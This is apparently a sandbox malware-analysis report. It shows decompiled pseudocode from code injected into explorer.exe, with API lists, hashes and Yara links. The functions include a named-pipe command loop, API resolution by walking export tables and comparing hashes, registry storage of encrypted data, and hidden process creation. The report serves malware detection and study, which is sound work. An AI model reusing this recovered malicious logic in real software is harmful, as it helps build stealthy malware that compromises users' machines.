				struct _OVERLAPPED* _t82;
				intOrPtr* _t83;
				signed int _t84;
				signed short* _t86;
				intOrPtr* _t97;
				signed short* _t105;
				void* _t107;
				void* _t108;
				void* _t109;
				intOrPtr* _t112;
				struct _OVERLAPPED* _t113;
				char _t114;
				void* _t115;

				_t113 = 0;
				_t82 = 0;
				_v8 = 0;
				_v12 = 0;
				while(1) {
					_v16 = _t113;
					if(ConnectNamedPipe( *0x9e674, _t113) == 0 && GetLastError() != 0x217) {
						break;
					}
					_push(_t113);
					_push( &_v16);
					_t41 =  *0x9e684; // 0x34f8f0
					_push(0x80000);
					_push( *0x9e724);
					_push( *0x9e674);
					if( *((intOrPtr*)(_t41 + 0x88))() == 0 || _v16 == 0) {
						GetLastError();
					} else {
						_t86 =  *0x9e724; // 0x2610020
						_t47 = ( *_t86 & 0x0000ffff) - 1;
						if(_t47 == 0) {
							_t112 = E000893BE( &(_t86[4]), 0x20, 1,  &_v24);
							_v40 = _t112;
							if(_t112 != 0) {
								_t114 = _v24;
								if(_t114 <= 1) {
									_t113 = 0;
									_t54 = E00081DA0(E00089749( *_t112), 0, 0, 0);
									_t115 = _t115 + 0x10;
									_v172 = _t54;
								} else {
									_v36 = _t114 - 1;
									_t83 = E00088604(_t114 - 1 << 2);
									_v32 = _t83;
									if(_t83 == 0) {
										_t113 = 0;
									} else {
										if(_t114 > 1) {
											_v20 = _t83;
											_t84 = 1;
											do {
												_t64 = E000891A6( *((intOrPtr*)(_t112 + _t84 * 4)), E0008C379( *((intOrPtr*)(_t112 + _t84 * 4))));
												_t97 = _v20;
												_t84 = _t84 + 1;
												 *_t97 = _t64;
												_v20 = _t97 + 4;
											} while (_t84 < _t114);
											_t83 = _v32;
										}
										_t113 = 0;
										_t61 = E00081DA0(E00089749( *_t112), _t83, _v36, 0);
										_t115 = _t115 + 0x10;
										_v172 = _t61;
										E000894B7( &_v24);
									}
									_t82 = _v12;
								}
							}
							_t105 =  *0x9e724; // 0x2610020
							E000896CA( &_v168,  &(_t105[4]), 0x80);
							_push(0x84);
							_push( &_v172);
							_push(2);
							goto L33;
						} else {
							_t65 = _t47 - 3;
							if(_t65 == 0) {
								_push(_t113);
								_push(_t113);
								_t108 = 5;
								E0008C319(_t108);
								 *0x9e758 = 1;
								_t82 = 1;
								_v12 = 1;
							} else {
								_t68 = _t65;
								if(_t68 == 0) {
									_t70 = E0008F79F( &_v8);
									goto L13;
								} else {
									_t72 = _t68 - 1;
									if(_t72 == 0) {
										E0008F79F( &_v8);
										goto L16;
									} else {
										_t76 = _t72 - 1;
										if(_t76 == 0) {
											_t70 = E0008F7C1( &_v8);
											L13:
											if(_t70 == 0) {
												_push(_t113);
												_push(_t113);
												_push(0xa);
											} else {
												_push(_v8);
												_push(_t70);
												_push(5);
											}
											_pop(_t109);
											E0008C319(_t109);
										} else {
											if(_t76 == 1) {
												E0008F7C1( &_v8);
												L16:
												_push(4);
												_push( &_v8);
												_push(5);
												L33:
												_pop(_t107);
												E0008C319(_t107);
												_t115 = _t115 + 0xc;
											}
										}
									}
								}
							}
						}
					}
					DisconnectNamedPipe( *0x9e674);
					if(_t82 == 0) {
						continue;
					}
					break;
				}
				return 0;
			}

0x000832ac
0x000832ae
0x000832b0
0x000832b4
0x000832b7
0x000832c3
0x000832ce
0x00000000
0x00000000
0x000832e1
0x000832e5
0x000832e6
0x000832eb
0x000832f0
0x000832f6
0x00083304
0x000834a8
0x00083314
0x00083314
0x0008331d
0x00083320
0x000833c8
0x000833ca
0x000833d1
0x000833d7
0x000833dd
0x00083456
0x00083461
0x00083466
0x00083469
0x000833df
0x000833e2
0x000833ee
0x000833f0
0x000833f6
0x00083471
0x000833f8
0x000833fd
0x000833ff
0x00083402
0x00083404
0x00083412
0x00083417
0x0008341a
0x0008341b
0x00083420
0x00083423
0x00083427
0x00083427
0x0008342c
0x00083439
0x0008343e
0x00083441
0x0008344d
0x0008344d
0x00083473
0x00083473
0x000833dd
0x00083476
0x0008348a
0x0008348f
0x0008349a
0x0008349b
0x00000000
0x00083326
0x00083326
0x00083329
0x00083397
0x00083398
0x0008339b
0x0008339c
0x000833a3
0x000833ae
0x000833b0
0x0008332b
0x0008332c
0x0008332f
0x0008337f
0x00000000
0x00083331
0x00083331
0x00083334
0x00083369
0x00000000
0x00083336
0x00083336
0x00083339
0x00083353
0x00083358
0x0008335b
0x00083386
0x00083387
0x00083388
0x0008335d
0x0008335d
0x00083360
0x00083361
0x00083361
0x0008338a
0x0008338b
0x0008333b
0x0008333e
0x00083348
0x0008336e
0x0008336e
0x00083373
0x00083374
0x0008349d
0x0008349d
0x0008349e
0x000834a3
0x000834a3
0x0008333e
0x00083339
0x00083334
0x0008332f
0x00083329
0x00083320
0x000834b4
0x000834bc
0x00000000
0x00000000
0x00000000
0x000834bc
0x000834c8

APIs

ConnectNamedPipe.KERNELBASE(00000000), ref: 000832C6
GetLastError.KERNEL32 ref: 000832D0

Part of subcall function 0008C319: FlushFileBuffers.KERNEL32(000001E4), ref: 0008C35F

DisconnectNamedPipe.KERNEL32 ref: 000834B4

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: NamedPipe$BuffersConnectDisconnectErrorFileFlushLast
String ID:
API String ID: 2389948835-0
Opcode ID: be6ae701c2cd6f96a3c21335c1a9f6642868689993e908009eddb05f95c01e46
Instruction ID: aec34d1c461da35ce7ea10a51bd790cfc71f6dd0dd97058cb51a1121444265f8
Opcode Fuzzy Hash: be6ae701c2cd6f96a3c21335c1a9f6642868689993e908009eddb05f95c01e46
Instruction Fuzzy Hash: 4151E472A00215ABEB61FFA4DC89AEEBBB8FF45750F104026F584A6151DB749B44CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0008B012, Relevance: 6.1, APIs: 4, Instructions: 72
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E0008B012(void* __ecx, WCHAR* __edx) {
				int _v8;
				void _v528;
				char _v1046;
				void _v1048;
				intOrPtr _t21;
				intOrPtr* _t26;
				void* _t27;
				intOrPtr _t33;
				intOrPtr _t36;
				void* _t39;
				intOrPtr _t40;
				WCHAR* _t47;
				void* _t49;

				_t39 = __ecx;
				_v8 = 0x104;
				_t47 = __edx;
				memset( &_v1048, 0, 0x208);
				memset( &_v528, 0, 0x208);
				_t21 =  *0x9e698; // 0x34fbc8
				 *((intOrPtr*)(_t21 + 4))(0, 0x1a, 0, 1,  &_v1048);
				_t49 = E0008B946(_t39);
				_t26 =  *0x9e6b8; // 0x34fbd8
				_t27 =  *_t26(_t49,  &_v528,  &_v8); // executed
				if(_t27 == 0) {
					_t33 =  *0x9e688; // 0xb0000
					if(E0008BB8D( *((intOrPtr*)( *((intOrPtr*)(_t33 + 0x110))))) != 0) {
						_t36 =  *0x9e698; // 0x34fbc8
						 *((intOrPtr*)(_t36 + 4))(0, 0x24, 0, 1,  &_v528);
					}
				}
				_t40 =  *0x9e684; // 0x34f8f0
				 *((intOrPtr*)(_t40 + 0x30))(_t49);
				lstrcpynW(_t47,  &_v1046 + E0008C392( &_v528) * 2, 0x104);
				return 1;
			}

0x0008b012
0x0008b023
0x0008b035
0x0008b037
0x0008b045
0x0008b054
0x0008b05f
0x0008b067
0x0008b074
0x0008b07a
0x0008b07e
0x0008b080
0x0008b094
0x0008b09d
0x0008b0a8
0x0008b0a8
0x0008b094
0x0008b0ab
0x0008b0b2
0x0008b0d0
0x0008b0dd

APIs

memset.MSVCRT ref: 0008B037
memset.MSVCRT ref: 0008B045
SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000001,?,?,?,?,?,?,00000000), ref: 0008B05F

Part of subcall function 0008B946: GetCurrentThread.KERNEL32(00000008,00000000,10000000,00000000,?,?,0008BA7C,74EC17D9,10000000), ref: 0008B959
Part of subcall function 0008B946: GetLastError.KERNEL32(?,?,0008BA7C,74EC17D9,10000000), ref: 0008B967
Part of subcall function 0008B946: GetCurrentProcess.KERNEL32(00000008,10000000,?,?,0008BA7C,74EC17D9,10000000), ref: 0008B980

lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,00000000), ref: 0008B0D0

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: Currentmemset$ErrorFolderLastPathProcessThreadlstrcpyn
String ID:
API String ID: 3158470084-0
Opcode ID: 3309cad5030584fc54aa8f49d31479e0ce1f2041df6bd5106adfde4e1a117ce7
Instruction ID: 19c7f563789c793ddff4382733eb78b8a69f152fd9c3ce08f6bae5569c2b2d08
Opcode Fuzzy Hash: 3309cad5030584fc54aa8f49d31479e0ce1f2041df6bd5106adfde4e1a117ce7
Instruction Fuzzy Hash: FA218EB2501218BFE710EBA4DCC9EDB77BCBB49354F1040A5F20AD7192EB749E458B60

Uniqueness

Uniqueness Score: -1.00%

Function 0008BF37, Relevance: 6.1, APIs: 4, Instructions: 72
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0008BF37(short* __edx, short* _a4) {
				void* _v8;
				int _v12;
				int _v16;
				char* _v20;
				char* _t30;
				intOrPtr _t31;
				char* _t49;

				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(RegOpenKeyExW(0x80000002, __edx, 0, 0x20019,  &_v8) == 0) {
					if(RegQueryValueExW(_v8, _a4, 0,  &_v16, 0,  &_v12) != 0) {
						L6:
						if(_v8 != 0) {
							_t31 =  *0x9e68c; // 0x34fab8
							 *((intOrPtr*)(_t31 + 0x1c))(_v8);
						}
						_t30 = 0;
						L9:
						return _t30;
					}
					_t49 = E00088604(_v12);
					_v20 = _t49;
					if(_t49 == 0) {
						goto L6;
					}
					if(RegQueryValueExW(_v8, _a4, 0, 0, _t49,  &_v12) == 0) {
						RegCloseKey(_v8);
						_t30 = _t49;
						goto L9;
					}
					E0008861A( &_v20, 0xfffffffe);
					goto L6;
				}
				return 0;
			}

0x0008bf55
0x0008bf58
0x0008bf5b
0x0008bf66
0x0008bf8a
0x0008bfc7
0x0008bfca
0x0008bfcc
0x0008bfd4
0x0008bfd4
0x0008bfd7
0x0008bfd9
0x00000000
0x0008bfd9
0x0008bf94
0x0008bf96
0x0008bf9c
0x00000000
0x00000000
0x0008bfb8
0x0008bfe5
0x0008bfe8
0x00000000
0x0008bfe8
0x0008bfc0
0x00000000
0x0008bfc6
0x00000000

APIs

RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,00000000,00000000,?,?,00082C08,00000000), ref: 0008BF5E
RegQueryValueExW.KERNEL32(00000000,00082C08,00000000,?,00000000,00082C08,00000000,?,?,00082C08,00000000), ref: 0008BF82
RegQueryValueExW.KERNEL32(00000000,00082C08,00000000,00000000,00000000,00082C08,?,?,00082C08,00000000), ref: 0008BFB0
RegCloseKey.KERNEL32(00000000,?,?,00082C08,00000000,?,?,?,?,?,?,?,000000AF,?), ref: 0008BFE5

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: QueryValue$CloseOpen
String ID:
API String ID: 1586453840-0
Opcode ID: 8ffa3b54626bbe71b199a840e3cf3d821d05c175afa1efb499af0953314715c4
Instruction ID: 30ccd786ff8b7b84f14da17d4d39020c4d4bce544ae74224a6a2efcb0f455484
Opcode Fuzzy Hash: 8ffa3b54626bbe71b199a840e3cf3d821d05c175afa1efb499af0953314715c4
Instruction Fuzzy Hash: 3121E8B6900118FFDB50EBA9DC48E9EBBF8FF88750B1541AAF645E6162D7309A00DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0008BE9B, Relevance: 6.1, APIs: 4, Instructions: 69
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0008BE9B(void* __ecx, char* __edx, char* _a4, intOrPtr* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char* _t34;
				intOrPtr* _t43;
				char* _t46;

				_t46 = 0;
				_v8 = 0;
				_v16 = 0;
				if(RegOpenKeyExA(__ecx, __edx, 0, 0x20019,  &_v8) != 0) {
					return 0;
				}
				_v12 = 0;
				if(RegQueryValueExA(_v8, _a4, 0,  &_v16, 0,  &_v12) == 0) {
					_t34 = E00088604(_v12 + 1); // executed
					_t46 = _t34;
					if(_t46 != 0 && RegQueryValueExA(_v8, _a4, 0,  &_v16, _t46,  &_v12) == 0) {
						_t43 = _a12;
						if(_t43 != 0) {
							 *_t43 = _v12;
						}
					}
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				return _t46;
			}

0x0008beae
0x0008beb8
0x0008bebb
0x0008bec3
0x00000000
0x0008bec5
0x0008becc
0x0008bee6
0x0008beed
0x0008bef2
0x0008bef7
0x0008bf15
0x0008bf1a
0x0008bf1f
0x0008bf1f
0x0008bf1a
0x0008bef7
0x0008bf24
0x0008bf2e
0x0008bf2e
0x00000000

APIs

RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,0034FC18,00000000,?,00000002), ref: 0008BEBE
RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 0008BEE1
RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 0008BF0E
RegCloseKey.KERNEL32(?,?,00000002), ref: 0008BF2E

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: QueryValue$CloseOpen
String ID:
API String ID: 1586453840-0
Opcode ID: ddc077ba024ef068cbd919a8e6084d299da2af67421786a4409f78ee1ec57403
Instruction ID: a503bc69bf056dc60d578d60e72969ac8cbe77b2aa393cc8f9a4dd6054926014
Opcode Fuzzy Hash: ddc077ba024ef068cbd919a8e6084d299da2af67421786a4409f78ee1ec57403
Instruction Fuzzy Hash: 0921A4B5A00148BF9B61DFA9DC44DAEBBF8FF98740B1141A9B945E7211D7309E00DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0008DFAD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0008DFAD(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E0008D400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E0008C379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

0x0008dfb6
0x0008dfb8
0x0008dfbb
0x0008dfbe
0x0008dfc4
0x0008e021
0x00000000
0x0008e021
0x0008dfc6
0x0008dfd1
0x0008dfd4
0x0008dfd9
0x0008dfde
0x0008dfe1
0x0008dfe3
0x0008dfe6
0x0008dfe9
0x0008dfee
0x00000000
0x00000000
0x00000000
0x00000000
0x0008dff0
0x0008dff0
0x0008e002
0x0008e00f
0x0008e013
0x00000000
0x00000000
0x0008e015
0x0008e018
0x0008e019
0x0008e01f
0x00000000
0x00000000
0x00000000
0x0008e01f
0x0008e036
0x0008e03b
0x0008e03f
0x00000000
0x0008e04b
0x0008e04b
0x0008e04d
0x0008e04d
0x0008e053
0x00000000
0x00000000
0x0008e059
0x0008e05d
0x0008e061
0x00000000
0x00000000
0x00000000
0x0008e061
0x0008e067
0x0008e06f
0x0008e074
0x0008e077
0x0008e077
0x0008e079
0x0008e07d
0x0008e085
0x00000000
0x00000000
0x0008e089
0x0008e091
0x00000000
0x00000000
0x00000000
0x0008e091

APIs

LoadLibraryA.KERNEL32(.dll), ref: 0008E07D
GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 0008E089

Strings

.dll, xrefs: 0008E079, 0008E07C

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: .dll
API String ID: 2574300362-2738580789
Opcode ID: 6b3667d21c83c631e7308aa9a773b73a335c260cf3743c54930195356ac01f65
Instruction ID: 961bbec8ee8d513a9e7f355b8d92f0886381f3dfd6057b13809224bdd72c88db
Opcode Fuzzy Hash: 6b3667d21c83c631e7308aa9a773b73a335c260cf3743c54930195356ac01f65
Instruction Fuzzy Hash: 6F310631A001458BCB25EFADC884BAEBBF5BF44304F280869D981D7352DB70EC81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0008A0AB, Relevance: 4.6, APIs: 3, Instructions: 146
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E0008A0AB(signed int __ecx, char* __edx, void* __fp0, void* _a4, char _a8, char _a12) {
				char* _v12;
				char _v16;
				int _v20;
				signed int _v24;
				intOrPtr _v28;
				char* _v32;
				char _v52;
				char _v64;
				char _v328;
				char _v2832;
				signed int _t48;
				signed int _t49;
				char* _t54;
				long _t73;
				long _t80;
				long _t83;
				void* _t88;
				char* _t89;
				intOrPtr _t90;
				void* _t103;
				void* _t104;
				char* _t106;
				intOrPtr _t107;
				char _t108;

				_t48 = __ecx;
				_t89 = __edx;
				_v24 = __ecx;
				if(_a4 == 0 || _a8 == 0) {
					L13:
					_t49 = _t48 | 0xffffffff;
					__eflags = _t49;
					return _t49;
				} else {
					_t115 = __edx;
					if(__edx == 0) {
						goto L13;
					}
					_t107 =  *((intOrPtr*)(__ecx + 0x108));
					_push(_t107);
					_t103 = 4;
					_v12 = __edx;
					_v28 = E0008D400( &_v12, _t103);
					_t93 = _t107 + __edx;
					E00092301(_t107 + __edx,  &_v2832);
					_t54 = E0009242D(_t93, _t115, __fp0,  &_v2832, 0, 0x64);
					_t108 = _a8;
					_v12 = _t54;
					_v20 = _t54 + 6 + _t108;
					_t106 = E00088604(_t54 + 6 + _t108);
					_v32 = _t106;
					if(_t106 != 0) {
						 *_t106 = _a12;
						_t16 =  &(_t106[6]); // 0x6
						_t106[1] = 1;
						_t106[2] = _t108;
						E000886E1(_t16, _a4, _t108);
						_t21 = _t108 + 6; // 0x6
						E000922D3( &_v2832, _t21 + _t106, _v12);
						_v16 = _t89;
						_t90 = _v24;
						_v12 =  *((intOrPtr*)(_t90 + 0x108));
						_push( &_v52);
						_t104 = 8;
						E0008F490( &_v16, _t104);
						E0008EAC1( &_v16,  &_v52, 0x14,  &_v328);
						E0008EB2E(_t106, _v20,  &_v328);
						_t73 = E00089B0E(_t90);
						_v12 = _t73;
						__eflags = _t73;
						if(_t73 != 0) {
							E000897A0(_v28,  &_v64, 0x10);
							_t80 = RegOpenKeyExA( *(_t90 + 0x10c), _v12, 0, 2,  &_a4);
							__eflags = _t80;
							if(_t80 == 0) {
								_t83 = RegSetValueExA(_a4,  &_v64, 0, 3, _t106, _v20);
								__eflags = _t83;
								if(_t83 != 0) {
									_push(0xfffffffc);
									_pop(0);
								}
								RegCloseKey(_a4);
							} else {
								_push(0xfffffffd);
								_pop(0);
							}
							E0008861A( &_v12, 0xffffffff);
						}
						E0008861A( &_v32, 0);
						return 0;
					}
					_t88 = 0xfffffffe;
					return _t88;
				}
			}

0x0008a0b8
0x0008a0bd
0x0008a0bf
0x0008a0c2
0x0008a231
0x0008a231
0x0008a231
0x00000000
0x0008a0d2
0x0008a0d2
0x0008a0d4
0x00000000
0x00000000
0x0008a0da
0x0008a0e3
0x0008a0e6
0x0008a0e7
0x0008a0ef
0x0008a0f2
0x0008a0fd
0x0008a10d
0x0008a112
0x0008a115
0x0008a11e
0x0008a126
0x0008a12b
0x0008a130
0x0008a13d
0x0008a13f
0x0008a146
0x0008a14b
0x0008a14e
0x0008a156
0x0008a163
0x0008a168
0x0008a16e
0x0008a177
0x0008a17d
0x0008a180
0x0008a181
0x0008a193
0x0008a1a3
0x0008a1af
0x0008a1b4
0x0008a1b7
0x0008a1b9
0x0008a1c3
0x0008a1de
0x0008a1e1
0x0008a1e3
0x0008a1fe
0x0008a201
0x0008a203
0x0008a205
0x0008a207
0x0008a207
0x0008a210
0x0008a1e5
0x0008a1e5
0x0008a1e7
0x0008a1e7
0x0008a219
0x0008a21f
0x0008a226
0x00000000
0x0008a22d
0x0008a134
0x00000000
0x0008a134

APIs

Part of subcall function 0009242D: _ftol2_sse.MSVCRT ref: 0009248E

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

RegOpenKeyExA.KERNEL32(?,00000000,00000000,00000002,00000000), ref: 0008A1DE

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: AllocateHeapOpen_ftol2_sse
String ID:
API String ID: 3756893521-0
Opcode ID: a869f1493576e0564957202c263c6ba23f2199c5f3dac02cda2040495ac44554
Instruction ID: 678beb8ec0cb8c060cb6281312f41271aa2b36fb26bfbf1ebb42210e6552e48b
Opcode Fuzzy Hash: a869f1493576e0564957202c263c6ba23f2199c5f3dac02cda2040495ac44554
Instruction Fuzzy Hash: 7551B372A00209BBDF20EF94DC41FDEBBB8BF05320F108166F555A7291EB749644CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0008A911, Relevance: 4.6, APIs: 3, Instructions: 74
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E0008A911(WCHAR* _a4, DWORD* _a8, intOrPtr _a12, signed int _a16) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v92;
				signed int _t24;
				intOrPtr _t30;
				intOrPtr _t32;
				intOrPtr _t34;
				int _t42;
				WCHAR* _t44;

				_t42 = 0x44;
				memset( &_v92, 0, _t42);
				_v92.cb = _t42;
				asm("stosd");
				_t44 = 1;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 = _a16;
				if(_t24 != 0) {
					_v92.dwFlags = 1;
					_v92.wShowWindow = 0;
				}
				asm("sbb eax, eax");
				if(CreateProcessW(0, _a4, 0, 0, 0,  ~_t24 & 0x08000000, 0, 0,  &_v92,  &_v20) == 0) {
					_t44 = 0;
				} else {
					if(_a8 != 0) {
						_push(_a12);
						_t34 =  *0x9e684; // 0x34f8f0
						_push(_v20.hProcess);
						if( *((intOrPtr*)(_t34 + 0x2c))() >= 0) {
							GetExitCodeProcess(_v20.hProcess, _a8);
						}
					}
					_t30 =  *0x9e684; // 0x34f8f0
					 *((intOrPtr*)(_t30 + 0x30))(_v20.hThread);
					_t32 =  *0x9e684; // 0x34f8f0
					 *((intOrPtr*)(_t32 + 0x30))(_v20);
				}
				return _t44;
			}

0x0008a91c
0x0008a925
0x0008a92c
0x0008a934
0x0008a938
0x0008a939
0x0008a93a
0x0008a93b
0x0008a93c
0x0008a941
0x0008a945
0x0008a948
0x0008a948
0x0008a955
0x0008a971
0x0008a9ae
0x0008a973
0x0008a976
0x0008a978
0x0008a97b
0x0008a980
0x0008a988
0x0008a990
0x0008a990
0x0008a988
0x0008a996
0x0008a99e
0x0008a9a1
0x0008a9a9
0x0008a9a9
0x0008a9b6

APIs

memset.MSVCRT ref: 0008A925
CreateProcessW.KERNEL32(00000000,00001388,00000000,00000000,00000000,0008C1AB,00000000,00000000,?,00000000,00000000,00000000,00000001), ref: 0008A96C
GetExitCodeProcess.KERNEL32(00000000,?), ref: 0008A990

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: Process$CodeCreateExitmemset
String ID:
API String ID: 4170947310-0
Opcode ID: 225cfbb69293b3eed798390d4c55be612c5650c273af84687da85cfb64abf4ec
Instruction ID: 69c2d589c2e0a2c9629c015d340a78d4e10d2ecd89ef4d1a65b39d481363986c
Opcode Fuzzy Hash: 225cfbb69293b3eed798390d4c55be612c5650c273af84687da85cfb64abf4ec
Instruction Fuzzy Hash: C0215C72A00118BFEF519FA9DC84EAFBBBCFF08380B014426FA55E6560D6349C00CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0008B998, Relevance: 4.6, APIs: 3, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0008B998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E00088604(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E0008861A( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}

0x0008b99b
0x0008b99c
0x0008b9a3
0x0008b9ab
0x0008b9af
0x0008b9b8
0x0008b9fe
0x0008b9fe
0x0008b9c5
0x0008b9cd
0x0008b9cf
0x0008b9d5
0x0008b9ee
0x00000000
0x0008b9f0
0x0008b9f5
0x00000000
0x0008b9fb
0x0008b9d7
0x0008b9d7
0x0008b9d7
0x0008b9d7
0x0008b9d5
0x0008ba04

APIs

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9B3
GetLastError.KERNEL32(?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9BA

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9E9

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: InformationToken$AllocateErrorHeapLast
String ID:
API String ID: 2499131667-0
Opcode ID: 58d5a4d227ababbac2af2871f3b2c126f10e885371167daa7ee16d967e8deb72
Instruction ID: 50b00f07447128573cf446961854993498285b3da02e0cb9ad280b6d8ca9cbf5
Opcode Fuzzy Hash: 58d5a4d227ababbac2af2871f3b2c126f10e885371167daa7ee16d967e8deb72
